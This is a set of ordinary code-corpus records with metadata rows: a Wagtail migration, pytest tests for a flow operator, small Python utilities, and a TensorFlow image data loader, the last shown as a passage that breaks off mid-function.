('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('heading', models.CharField(blank=True, max_length=255, null=True)),
('heading_en', models.CharField(blank=True, max_length=255, null=True)),
('heading_fr', models.CharField(blank=True, max_length=255, null=True)),
('heading_es', models.CharField(blank=True, max_length=255, null=True)),
('heading_pt', models.CharField(blank=True, max_length=255, null=True)),
('excerpt', models.TextField(blank=True, null=True)),
('excerpt_en', models.TextField(blank=True, null=True)),
('excerpt_fr', models.TextField(blank=True, null=True)),
('excerpt_es', models.TextField(blank=True, null=True)),
('excerpt_pt', models.TextField(blank=True, null=True)),
('content_editor', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('content_editor_en', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('content_editor_fr', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('content_editor_es', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('content_editor_pt', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('ssot_path', models.TextField(blank=True, help_text='Folder path of SSOT object', null=True)),
('tag', models.CharField(help_text='Associated git release tag', max_length=255)),
('data', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_en', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_fr', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_es', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_pt', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('header_image', models.ForeignKey(blank=True, help_text='This is the image that will appear in the header banner at the top of the page. If no image is added a placeholder image will be used.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('social_media_image', models.ForeignKey(blank=True, help_text='This image will be used as the image for social media sharing cards.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.AddField(
model_name='iatistandardpage',
name='latest_version_page',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='iati_standard.ActivityStandardPage'),
),
]
| 144.256983 | 1,461 | 0.694137 | 3,026 | 25,822 | 5.828817 | 0.073364 | 0.099161 | 0.141683 | 0.076653 | 0.905545 | 0.897834 | 0.891484 | 0.887346 | 0.884227 | 0.874532 | 0 | 0.005301 | 0.130586 | 25,822 | 178 | 1,462 | 145.067416 | 0.780356 | 0.001781 | 0 | 0.703488 | 1 | 0.017442 | 0.255645 | 0.01098 | 0.034884 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052326 | 0 | 0.069767 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
74dbfde73e74c176e2a57ff4ecdac83184f8ee9f | 49 | py | Python | test/test_brainflow.py | timeflux/timeflux_brainflow | f93545c6400522f886d9770aa6688d8955bfd34c | [
"MIT"
] | 3 | 2020-03-22T01:20:59.000Z | 2021-09-02T19:03:03.000Z | test/test_brainflow.py | timeflux/timeflux_brainflow | f93545c6400522f886d9770aa6688d8955bfd34c | [
"MIT"
] | 1 | 2021-04-03T19:50:15.000Z | 2021-04-03T22:52:13.000Z | test/test_openbci.py | timeflux/timeflux_openbci | 818d6651bd2211f462d98ce6f7322c2838bf8686 | [
"MIT"
] | 3 | 2020-02-03T23:37:59.000Z | 2020-07-02T19:09:34.000Z | import pytest
def test_none():
assert True
| 8.166667 | 16 | 0.693878 | 7 | 49 | 4.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.244898 | 49 | 5 | 17 | 9.8 | 0.891892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
741fd749e944fb9fa9167ecf62d8cb5939d4149d | 44 | py | Python | src/lib/modulefinder.py | DTenore/skulpt | 098d20acfb088d6db85535132c324b7ac2f2d212 | [
"MIT"
] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | src/lib/modulefinder.py | wakeupmuyunhe/skulpt | a8fb11a80fb6d7c016bab5dfe3712517a350b347 | [
"MIT"
] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | src/lib/modulefinder.py | wakeupmuyunhe/skulpt | a8fb11a80fb6d7c016bab5dfe3712517a350b347 | [
"MIT"
] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z | import _sk_fail; _sk_fail._("modulefinder")
| 22 | 43 | 0.795455 | 6 | 44 | 5 | 0.666667 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068182 | 44 | 1 | 44 | 44 | 0.731707 | 0 | 0 | 0 | 0 | 0 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
742a4e824e818128abb206e0b067a47b2ab34eba | 7,032 | py | Python | tests/flow/test_python_operator.py | ismaelJimenez/mamba_client | 2be6a14d61bbcd16db020f41146cca63c17ebf50 | [
"MIT"
] | null | null | null | tests/flow/test_python_operator.py | ismaelJimenez/mamba_client | 2be6a14d61bbcd16db020f41146cca63c17ebf50 | [
"MIT"
] | null | null | null | tests/flow/test_python_operator.py | ismaelJimenez/mamba_client | 2be6a14d61bbcd16db020f41146cca63c17ebf50 | [
"MIT"
] | null | null | null | import pytest
import time
from mamba_client.testing.utils import CallbackTestClass
from mamba_client.flow.operator.lifecycle import OperatorLifecycle
from mamba_client.station import Station
from mamba_client.flow.exceptions import MambaFlowException
from mamba_client.flow.operator import PythonOperator
class TestClass:
def test_python_operator(self):
cb = CallbackTestClass()
operator = PythonOperator(
operator_id='op_1',
schedule=0,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert operator.ready(0, {})
assert operator._lifecycle == OperatorLifecycle.no_status
assert cb.func_1_calls == []
operator.execute(0)
assert cb.func_1_calls == [0]
assert operator._lifecycle == OperatorLifecycle.success
assert not operator.ready(0, {})
operator = PythonOperator(
operator_id='op_1',
schedule=0,
op_args='asd',
python_callable=lambda it, st, cxt, args: cb.test_func_1(args))
assert operator.ready(0, {})
assert operator._lifecycle == OperatorLifecycle.no_status
assert cb.func_1_calls == [0]
operator.execute(0)
assert cb.func_1_calls == [0, 'asd']
assert operator._lifecycle == OperatorLifecycle.success
assert not operator.ready(0, {})
station = Station(station_id='station_1')
operator = PythonOperator(
operator_id='op_1',
schedule=0,
op_args='asd',
station=station,
python_callable=lambda it, st, cxt, args: cb.test_func_1(st))
assert operator.ready(0, {})
assert operator._lifecycle == OperatorLifecycle.no_status
assert cb.func_1_calls == [0, 'asd']
operator.execute(0)
assert cb.func_1_calls == [0, 'asd', station]
assert operator._lifecycle == OperatorLifecycle.success
assert not operator.ready(0, {})
operator = PythonOperator(
operator_id='op_1',
schedule=0,
op_args='asd',
station=station,
context={'a': 'b'},
python_callable=lambda it, st, cxt, args: cb.test_func_1(cxt))
assert operator.ready(0, {})
assert operator._lifecycle == OperatorLifecycle.no_status
assert cb.func_1_calls == [0, 'asd', station]
operator.execute(0)
assert cb.func_1_calls == [0, 'asd', station, {'a': 'b'}]
assert operator._lifecycle == OperatorLifecycle.success
assert not operator.ready(0, {})
operator = PythonOperator(
operator_id='op_1',
schedule=4,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert not operator.ready(0, {})
assert operator.ready(4, {})
assert operator.ready(5, {})
operator = PythonOperator(
operator_id='op_1',
upstream='op_0',
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert not operator.ready(0, {})
assert operator.ready(0, {'op_0': OperatorLifecycle.success})
operator = PythonOperator(
operator_id='op_1',
schedule_ts=3,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert not operator.ready(0, {})
time.sleep(1)
assert not operator.ready(0, {})
time.sleep(2.1)
assert operator.ready(0, {})
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
schedule=0,
upstream='op_0',
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert str(excinfo.value
) == 'Operator op_1 can not have schedule and upstream'
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert str(
excinfo.value) == 'Operator op_1 must have schedule or upstream'
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(operator_id='op_1',
schedule=0,
python_callable='text')
assert str(excinfo.value
) == 'Operator op_1 python_callable param must be callable'
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
schedule='0',
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert str(excinfo.value
) == 'Operator op_1 schedule must be a positive integer'
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
schedule=-1,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert str(excinfo.value
) == 'Operator op_1 schedule must be a positive integer'
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
schedule_ts='0',
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert str(excinfo.value
) == 'Operator op_1 schedule_ts must be a positive integer'
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
schedule_ts=-1,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it))
assert str(excinfo.value
) == 'Operator op_1 schedule_ts must be a positive integer'
operator = PythonOperator(
operator_id='op_1',
schedule=0,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it),
log=lambda _: cb.test_func_2(_))
operator.execute(0)
assert len(cb.func_2_calls) == 2
assert '[op_1] Start Operator Execution' in cb.func_2_calls[0]
assert '[op_1] Stop Operator Execution' in cb.func_2_calls[1]
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
schedule=0,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it),
log='')
assert str(excinfo.value) == 'Operator op_1 log param must be callable'
with pytest.raises(MambaFlowException) as excinfo:
PythonOperator(
operator_id='op_1',
schedule=0,
schedule_ts=0,
python_callable=lambda it, st, cxt, args: cb.test_func_1(it),
log='')
assert str(excinfo.value
) == 'Operator op_1 can not have schedule and schedule_ts'
| 34.302439 | 79 | 0.585324 | 810 | 7,032 | 4.890123 | 0.095062 | 0.021207 | 0.052764 | 0.111588 | 0.8667 | 0.853067 | 0.844231 | 0.798788 | 0.797021 | 0.788185 | 0 | 0.022902 | 0.31698 | 7,032 | 204 | 80 | 34.470588 | 0.801791 | 0 | 0 | 0.737179 | 0 | 0 | 0.088311 | 0 | 0 | 0 | 0 | 0 | 0.282051 | 1 | 0.00641 | false | 0 | 0.044872 | 0 | 0.057692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7445d9a6a238059566a29f962d48358d9b159b19 | 362 | py | Python | recipes/Python/577252_lreplace_rreplace_Replace_beginning_ends/recipe-577252.py | tdiprima/code | 61a74f5f93da087d27c70b2efe779ac6bd2a3b4f | [
"MIT"
] | 2,023 | 2017-07-29T09:34:46.000Z | 2022-03-24T08:00:45.000Z | recipes/Python/577252_lreplace_rreplace_Replace_beginning_ends/recipe-577252.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 32 | 2017-09-02T17:20:08.000Z | 2022-02-11T17:49:37.000Z | recipes/Python/577252_lreplace_rreplace_Replace_beginning_ends/recipe-577252.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 780 | 2017-07-28T19:23:28.000Z | 2022-03-25T20:39:41.000Z | import re
def lreplace(pattern, sub, string):
"""
Replaces 'pattern' in 'string' with 'sub' if 'pattern' starts 'string'.
"""
return re.sub('^%s' % pattern, sub, string)
def rreplace(pattern, sub, string):
"""
Replaces 'pattern' in 'string' with 'sub' if 'pattern' ends 'string'.
"""
return re.sub('%s$' % pattern, sub, string)
| 25.857143 | 75 | 0.60221 | 46 | 362 | 4.73913 | 0.347826 | 0.183486 | 0.293578 | 0.220183 | 0.816514 | 0.816514 | 0.816514 | 0.816514 | 0.504587 | 0.504587 | 0 | 0 | 0.220994 | 362 | 13 | 76 | 27.846154 | 0.77305 | 0.389503 | 0 | 0 | 0 | 0 | 0.031579 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
744d3dea7d84fdc0ab694f357671c7a6d5d97698 | 1,242 | py | Python | combine_subs.py | NDKoehler/DataScienceBowl2017_7th_place | 638542c3cde5af45bf34d0391695ab0e54ce78b8 | [
"MIT"
] | 8 | 2017-05-19T10:30:20.000Z | 2022-03-12T05:17:19.000Z | combine_subs.py | NDKoehler/DataScienceBowl2017_7th_place | 638542c3cde5af45bf34d0391695ab0e54ce78b8 | [
"MIT"
] | 5 | 2017-07-03T10:55:29.000Z | 2018-09-10T18:05:14.000Z | combine_subs.py | NDKoehler/DataScienceBowl2017_7th_place | 638542c3cde5af45bf34d0391695ab0e54ce78b8 | [
"MIT"
] | 6 | 2017-05-12T00:58:05.000Z | 2019-01-22T05:08:09.000Z | import pandas as pd
import numpy as np
import os
from dsb3 import utils
outpath = './out/'
utils.ensure_dir(outpath)
data1 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_2D_05res_80/submission.csv')
data2 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_2D_07res_80/submission.csv')
data3 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_3D_05res_80/submission.csv')
data4 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_3D_07res_80/submission.csv')
data1['cancer'] += data2['cancer']
data1['cancer'] += data3['cancer']
data1['cancer'] += data4['cancer']
data1['cancer'] /= 4
data1.to_csv(outpath + 'submission_80.csv', index = False)
data1 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_2D_05res_100/submission.csv')
data2 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_2D_07res_100/submission.csv')
data3 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_3D_05res_100/submission.csv')
data4 = pd.read_csv('./datapipeline_final/dsb3_0/gen_submission_3D_07res_100/submission.csv')
data1['cancer'] += data2['cancer']
data1['cancer'] += data3['cancer']
data1['cancer'] += data4['cancer']
data1['cancer'] /= 4
data1.to_csv(outpath + 'submission_100.csv', index = False)
| 40.064516 | 93 | 0.775362 | 188 | 1,242 | 4.797872 | 0.191489 | 0.053215 | 0.079823 | 0.186253 | 0.844789 | 0.844789 | 0.844789 | 0.844789 | 0.844789 | 0.844789 | 0 | 0.079447 | 0.067633 | 1,242 | 30 | 94 | 41.4 | 0.699482 | 0 | 0 | 0.333333 | 0 | 0 | 0.548309 | 0.447665 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
744f140194e7e4e66c2db1f9dada4e4f2fdd88a5 | 15,923 | py | Python | VisionEngine/data_loaders/data_loader.py | ietheredge/VisionEngine | 271c8dcaef6eb574e9047fca436d7b13cab75d3b | [
"MIT"
] | 4 | 2020-09-29T14:17:25.000Z | 2022-03-05T18:04:33.000Z | VisionEngine/data_loaders/data_loader.py | ietheredge/VisionEngine | 271c8dcaef6eb574e9047fca436d7b13cab75d3b | [
"MIT"
] | null | null | null | VisionEngine/data_loaders/data_loader.py | ietheredge/VisionEngine | 271c8dcaef6eb574e9047fca436d7b13cab75d3b | [
"MIT"
] | 1 | 2022-03-07T17:38:30.000Z | 2022-03-07T17:38:30.000Z | """
Copyright (c) 2020 R. Ian Etheredge All rights reserved.
This work is licensed under the terms of the MIT license.
For a copy, see <https://opensource.org/licenses/MIT>.
"""
from VisionEngine.base.base_data_loader import BaseDataLoader
from VisionEngine.data_loaders.datasets import guppies, butterflies
import tensorflow as tf
import pathlib
import os
class DataLoader(BaseDataLoader):
def __init__(self, config):
super(DataLoader, self).__init__(config)
self.data_dir = pathlib.Path(
os.path.join(
os.getenv("VISIONENGINE_HOME"),
self.config.data_loader.folder_loc,
self.config.data_loader.dataset,
)
)
if not os.path.exists(self.data_dir):
if self.config.data_loader.dataset == "guppies":
guppies.load_data()
elif self.config.data_loader.dataset == "butterflies":
butterflies.load_data()
else:
raise NotImplementedError
else:
print("Using cached dataset")
def get_train_data(self):
def alpha_blend_decoded_png(file):
# alpha blending with a white background
bg = tf.ones((256, 256, 3)) # change to tf.zeros for a black bg
r = ((1 - file[:, :, 3]) * bg[:, :, 0]) + (file[:, :, 3] * file[:, :, 0])
g = ((1 - file[:, :, 3]) * bg[:, :, 1]) + (file[:, :, 3] * file[:, :, 1])
b = ((1 - file[:, :, 3]) * bg[:, :, 2]) + (file[:, :, 3] * file[:, :, 2])
rgb = tf.stack([r, g, b], axis=2)
return rgb
def preprocess_input(path):
FILE = tf.io.read_file(path)
img = tf.image.decode_png(FILE, channels=0)
img = tf.image.convert_image_dtype(img, tf.float32)
img = alpha_blend_decoded_png(img)
output_img = img
if self.config.data_loader.augment is True:
img, output_img = self.random_jitter(img, output_img)
if self.config.model.final_activation == "tanh":
self.normalize(img, output_img)
return img, output_img
def preprocess_input_celeba(path):
FILE = tf.io.read_file(path)
img = tf.image.decode_jpeg(FILE)
img = tf.image.convert_image_dtype(img, tf.float32)
img = tf.image.resize_with_pad(img, 256, 256)
output_img = img
if self.config.data_loader.augment is True:
img, output_img = self.random_jitter(img, output_img)
if self.config.model.final_activation == "tanh":
self.normalize(img, output_img)
return img, output_img
def prepare_for_training(
ds,
cache=self.config.data_loader.cache,
shuffle=self.config.data_loader.shuffle,
shuffle_buffer_size=1000,
):
if cache:
if isinstance(cache, str):
ds = ds.cache(cache)
else:
ds = ds.cache()
if shuffle:
ds = ds.shuffle(buffer_size=shuffle_buffer_size)
ds = ds.repeat()
ds = ds.batch(self.config.trainer.batch_size)
ds = ds.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
return ds
# butterfly dataset
if self.config.data_loader.dataset == "butterflies":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
raise NotImplementedError
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), seed=42
)
else:
raise NotImplementedError
# overwrite the number of samples in the config
self.config.data_loader.n_samples = len(list(list_data))
# preprocess and create dataset
ds = list_data.map(
preprocess_input, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# guppy dataset
elif self.config.data_loader.dataset == "guppies":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), seed=42
)
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*_*/*"), seed=42
)
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "[!a-z][!a-z]/*"), seed=42
)
# overwrite the number of samples in the config
self.config.data_loader.n_samples = len(list(list_data))
# preprocess and create dataset
ds = list_data.map(
preprocess_input, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# celeba dataset
elif self.config.data_loader.dataset == "celeba":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
raise NotImplementedError
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), seed=42
)
else:
raise NotImplementedError
# overwrite the number of samples in the config
self.config.data_loader.n_samples = len(list(list_data))
# preprocess and create dataset
ds = list_data.map(
preprocess_input_celeba,
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
else:
raise NotImplementedError
# split train and eval
train_ds_size = int(
(1 - self.config.data_loader.validation_split)
* self.config.data_loader.n_samples
)
ds_train = ds.take(train_ds_size)
ds_val = ds.skip(train_ds_size)
# prepare splits for training
train_ds = prepare_for_training(ds_train)
validation_ds = prepare_for_training(ds_val)
return (train_ds, validation_ds)
def get_test_data(self):
def alpha_blend_decoded_png(file):
# alpha blending with a white background
bg = tf.ones((256, 256, 3)) # if you want black change to tf.zeros
r = ((1 - file[:, :, 3]) * bg[:, :, 0]) + (file[:, :, 3] * file[:, :, 0])
g = ((1 - file[:, :, 3]) * bg[:, :, 1]) + (file[:, :, 3] * file[:, :, 1])
b = ((1 - file[:, :, 3]) * bg[:, :, 2]) + (file[:, :, 3] * file[:, :, 2])
rgb = tf.stack([r, g, b], axis=2)
return rgb
def preprocess_input(path):
FILE = tf.io.read_file(path)
label = tf.strings.split(path, os.path.sep)[-2]
img = tf.image.decode_png(FILE, channels=0)
img = tf.image.convert_image_dtype(img, tf.float32)
img = alpha_blend_decoded_png(img)
label = tf.strings.split(path, os.path.sep)[-2]
if self.config.model.final_activation == "tanh":
img, _ = self.normalize(img, None)
return img, label
def preprocess_input_celeba(path):
FILE = tf.io.read_file(path)
img = tf.image.decode_jpeg(FILE)
img = tf.image.convert_image_dtype(img, tf.float32)
img = tf.image.resize_with_pad(img, 256, 256)
LABELFILE = tf.io.read_file(path)
label = tf.strings.split(path, os.path.sep)[-2]
if self.config.model.final_activation == "tanh":
img, _ = self.normalize(img, None)
return img, label
def prepare_for_testing(
ds,
cache=self.config.data_loader.cache,
shuffle=self.config.data_loader.shuffle,
shuffle_buffer_size=100,
):
if cache:
if isinstance(cache, str):
ds = ds.cache(cache)
else:
ds = ds.cache()
if shuffle:
ds = ds.shuffle(shuffle_buffer_size)
ds = ds.batch(self.config.trainer.batch_size)
ds = ds.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
return ds
# butterfly dataset
if self.config.data_loader.dataset == "butterflies":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
raise NotImplementedError
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), shuffle=False, seed=42
)
else:
